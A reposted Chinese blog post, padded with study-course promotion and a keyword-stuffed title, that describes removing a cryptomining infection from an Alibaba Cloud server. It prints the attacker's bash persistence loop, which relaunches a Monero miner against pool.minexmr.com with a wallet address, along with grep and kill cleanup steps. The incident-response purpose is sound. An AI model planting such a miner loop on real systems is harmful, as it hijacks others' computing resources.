软件测试最新阿里云服务器出现入侵事件:挖矿进程——pool(1),作为一个软件测试程序员你还不会JetPack

最新推荐文章于 2024-05-31 12:43:11 发布
最新推荐文章于 2024-05-31 12:43:11 发布
阅读量293 收藏 5
点赞数 8
分类专栏: 程序员 文章标签: 单元测试 功能测试 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84561579/article/details/138827668
版权

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa

干掉它

kill -9 11110

2.全局搜索这个进程

[root@wangtianze ~]# grep -r pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:cat daemon | grep pool.minexmr.com
.bash_history:cat deamon | grep pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:grep -r pool.minexmr.com
.bash_history:ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid' | pool.minexmr.com
.bash_history:grep -r pool.minexmr.com

3.打开搜索到的位置

# vim /boot/grub/deamon

里面是这样的

#!/bin/bash
#daemon
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
while true;
do
    server=`ps aux | grep 'pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj' | grep -v grep`
    if [ ! "$server" ]; then
        \cp -rf /boot/grub/grub.tz /usr/sbin/bashd
        chmod +x /usr/sbin/bashd
        cd /usr/sbin
        nohup bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3paE7opiwmfUKfbCDMYvUAPaMZJre4QZnPuxBvnEhL5CpuVXH9tAMeBmQfSebQBHYUwycARchB8CokkVAAetDnupYsj -p x &
    fi
    sleep 15
done

删掉里面的while循环,只保留

#!/bin/bash
#daemon
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin

全局搜索

# grep -r pool.minexmr.com

同样干掉

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

、讲解视频,并且后续会持续更新**

需要这份系统化的资料的朋友,可以戳这里获取

2401_84561579
关注
专栏目录
WanAndroidKoin:这是一个玩安卓,jetpack最新实践项目
03-27
《WanAndroidKoin: Jetpack与Kotlin的最新实践解析》 在当前的移动开发领域,Android开发者正逐步转向使用Jetpack组件库和Kotlin编程语言,以提高开发效率和代码质量。WanAndroidKoin项目,正如其标题所示,是将这...
阿里云服务器出现入侵事件挖矿进程——pool.minexmr.com的解决办法
热门推荐
王天泽的博客
08-28 1万+
1.查看进程# ps -e -o 'pid,comm,args,pcpu,rsz,vsz,stime,user,uid'找出CPU占有率高的你不认识的进程,我的是这样的bashd -a cryptonight -o stratum+tcp://pool.minexmr.com:5555 -u 4AUF3pa干掉它kill -9 111102.全局搜索这个进程[root@wangtianze ~]#
Wannamine家族挖矿病毒处置
qq_51068285的博客
02-15 3221
wannamine的手动处置
解决阿里云服务器被植入挖矿脚本过程
拽着尾巴的鱼儿的博客
06-21 4485
基于学习的便利性,在阿里云服务中购买了云服务器,但是突然被告警提示被挖矿,而且要在一定期限内解决挖矿问题,否则就会被关停服务,本篇对于其处理过程进行一个记录,可能对于挖矿的处理也不全面,欢迎各路大神进行评论交流。以上就是今天要讲的内容,本文仅仅简单记录了处理服务器挖矿的流程,记录的不全面,欢迎各路大神探讨交流。
检查是否中了挖矿木马4 linux,一款新型的Linux挖矿木马来袭
weixin_42421284的博客
05-13 785
原标题:一款新型的Linux挖矿木马来袭一、事件背景最近接到客户反馈,发现Linux机器卡顿,CPU使用量超标高达90%以上,怀疑被挖矿,深信服EDR安全团队第一时间进行了应急处理,并发现该挖矿木马为一款新型的Linux挖矿木马,并对此样本进行了深入的研究分析。二、样本分析1.对一系列矿池地址进行DNS查询请求,如下:相应的矿池地址列表如下: pool.minexmr.com,xmr-eu1.na...
最新阿里云服务器出现入侵事件挖矿进程——pool,2024年最新成功入职阿里
2301_76379671的博客
05-12 1056
【代码】最新阿里云服务器出现入侵事件挖矿进程——pool,2024年最新成功入职阿里。
frontend-jetpack:一个喷气背包准备好让你在前端开发中如此出色
07-10
前端喷气背包使用 、 、使用 、 、 和前端... 此外,您的 js 文件有一个 minifier 和一个 concat,用于创建一个 js 文件到输出。 如果您的 js 文件中有代码错误,您的 SO 通知将出现以警告您。 使用 images/sprites/ 中
star-wars-jetpack一个示例应用程序,展示了如何使用Jetpack的新功能实现Clean Architecture
02-04
Jetpack作为Android开发的一个重要组件,提供了一系列工具来帮助开发者实现这一目标。本文将通过一个名为“star-wars-jetpack”的示例应用程序,详细讲解如何利用Jetpack的新特性实现Clean Architecture,从而提升...
compose-challenge-week1:jetpack中的第一个挑战应用程序compose开发挑战系列
02-25
提交要求按照项目网站上的挑战说明进行操作: 所有UI均应使用Jetpack Compose编写Github Actions工作流程应该成功完成在文件夹中包括两个提交的屏幕截图。 名称应为screenshot_1.png和screenshot_2.png。 在文件夹中...
jetpack-connection:[只读] Jetpack连接。 该存储库是一个镜像,可用于问题跟踪和开发
03-22
我们建议在那里使用最新版本,或者您也可以使用以下最新开发版本进行测试: "require": { "automattic/jetpack-autoloader": "dev-master", "automattic/jetpack-config": "dev-master", "automattic/jetpack-...
阿里云服务器被通知存在“挖矿”行为,请及时整改
ywanju的博客
04-04 954
挖矿”行为是违f 的,一般如果不是自己操作的话,那就是被别人攻击了,利用漏洞在你的服务器上面安装了木马之类的东西。早晨被通知阿里云服务器存在挖矿行为,请及时整改,不然服务器被收回。
应急响应流程以及入侵排查
renyizou的博客
01-14 5864
归纳转载于: 应急响应的整体思路和基本流程 - FreeBuf网络安全行业门户不管是普通的企业,还是专业的安全厂商,都不可避免的需要掌握和运用好信息安全的知识、技能,以便在需要的时候,能够御敌千里。https://www.freebuf.com/articles/endpoint/192859.html 应急响应之windows入侵排查篇 - FreeBuf网络安全行业门户本文主要讨论windows被入侵后的排查思路。https://www.freebuf.com/articles/network/28
阿里云挖矿病毒解决
weixin_39766667的博客
02-20 2517
有一次,我们在阿里上的服务器收到这样的短信。【阿里云】尊敬的xxxxxx:经检测您的阿里云服务(ECS实例)xxxxxxxx存在挖矿活动。根据相关法规、政策的规定及监管部门的要求,请您于2023-02-27 00时前完成挖矿问题整改,否则您的服务将被关停,详情请查看邮件或阿里云站内消息通知。若您有其他问题,可登陆阿里云官网在线咨询这就是中了挖矿病毒,如何处理它?
阿里云被恶意挖矿的处理方法
qq_55809729的博客
10-03 1022
亲测:阿里云被恶意挖矿的处理方法
阿里云服务器挖矿
最新发布
weixin_44034675的博客
05-31 1279
新增SSH端口——>重启sshd服务——>添加防火墙规则——>尝试新端口登陆——>关闭原先的22端口——>增加ip白名单。dr-xr-x---. 8 root root 4096 3月 19 15:57 ..drwx------ 2 root root 4096 3月 18 14:47 .drwx------. 2 root root 4096 8月 9 2019 .- 删除i属性使文件 /etc/passwd和 /etc/shadow具有相同的属性。控制台会自动断开之前使用端口22产生的连接。
阿里云服务器挖矿的解决方法
qq_47464056的博客
07-25 5060
云服务器被入侵植入挖矿程序!
记一次阿里云被挖矿处理记录,一个漏洞2w+
jennycisp的博客
08-14 465
本篇文章还有很多的不足之处,并没有找到病毒攻击的入口,又是如何入侵到系统的,挖矿的脚本究竟运行在哪?按照正常的被攻击排错方式,一开始并不顺利。总结一下系统被入侵的排查思路,只是给后来者提供一下解决思路(希望大家的系统都很健壮,不被攻击)。查看系统的CPU和内存占用查询占用系统资源过高的进程排查定时任务,crontab -l或者目录检查异常端口,如发现,禁用端口,堵漏使用last命令查看系统异常登录情况(一般攻击者会抹去入侵记录)使用history。
挖矿病毒应急响应思路,挖矿病毒事件处理步骤
Innocence_0的博客
09-05 478
比特币系统每隔一段时间就会在节点上生成一个「随机代码」,互联网中的所有设备都可以寻找这个代码,谁先找到就能获得奖励。而「寻找代码」的过程,就是挖矿。设备通过计算来筛选出符合条件的随机代码,每找到一个随机代码往往需要上万亿次的「哈希运算」,CPU通常会被顶到100%。为了「降低成本」,黑客往往会通过入侵的方式,控制别人的计算机来帮自己挖矿。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
阿里云挖矿./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 10
fuleigang的专栏
03-16 1191
根据相关法规、政策的规定及监管部门的要求,阿里云禁止客户利用阿里云服务直接或间接地从事与虚拟货币相关的业务及行为,包括但不限于虚拟货币的勘探(挖矿)、登记、交易、清算、结算等,如用户违反上述规定,阿里云有权立即停止提供所有服务。删除这个目录,发现过一会又出现,根据目录看应该是jekins程序导致的,进入jekins配置,发现异常流水线一直在构建,怪不得杀进程删文件都没用,一直在构建一直产生新的,将漏洞程序删除。杀完后发现还是异常,怀疑可能是定时任务,继续杀定时任务,发现没用,继续跟进PId查找原因,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值